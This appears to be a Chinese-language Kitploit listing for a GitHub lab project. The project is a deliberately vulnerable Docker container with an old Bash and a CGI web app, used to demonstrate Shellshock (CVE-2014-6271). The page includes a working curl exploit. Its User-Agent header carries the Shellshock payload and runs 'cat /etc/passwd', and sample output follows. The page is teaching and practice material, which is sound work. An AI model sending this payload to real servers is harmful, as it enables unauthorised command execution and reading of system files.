Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
vaas-cve-2014-6271 — 漏洞即服务:展示 CVS-2014-6271,又称 Shellshock | Kitploit
工具/GitHubGitHub/hmlio/vaas-cve-2014-6271
容器安全漏洞分析漏洞利用Web应用程序漏洞利用学习与教育实验室与实践
GitHubhmlio/vaas-cve-2014-6271

vaas-cve-2014-6271

漏洞即服务:展示 CVS-2014-6271,又称 Shellshock

查看仓库
22716年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

漏洞即服务 - CVE 2014-6271

一个运行 Debian (Buster) Linux 的系统,带有易受攻击版本的 bash 和一个用于展示 CVS-2014-6271(又名 Shellshock)的 Web 应用程序。

概述

该 Docker 容器基于 Debian Buster,并已被修改为使用存在漏洞的 Bash 版本 (bash_4.2:2b:dfsg-0.1)。

可通过 Apache 2 访问一个 Web 应用程序,它提供了一个运行 shell 命令的 CGI 脚本。

使用方法

使用 docker pull hmlio/vaas-cve-2014-6271 安装容器。

使用端口映射 docker run -d -p 8080:80 hmlio/vaas-cve-2014-6271 运行容器。

你应该可以通过 http://your-ip:8080/ 访问该 Web 应用程序。

漏洞利用

该 Web 应用程序/存在漏洞的 bash 版本可按如下方式进行利用:

root@kitploit:~
# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" http://your-ip:8080/cgi-bin/stats

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh

致谢

该概念和 Web 应用程序深受由 rasta_mouse 创建的 VulnHub 虚拟机 "Sokar" 的启发。 更多详情请参阅 https://www.vulnhub.com/entry/sokar-1,113/。

下载工具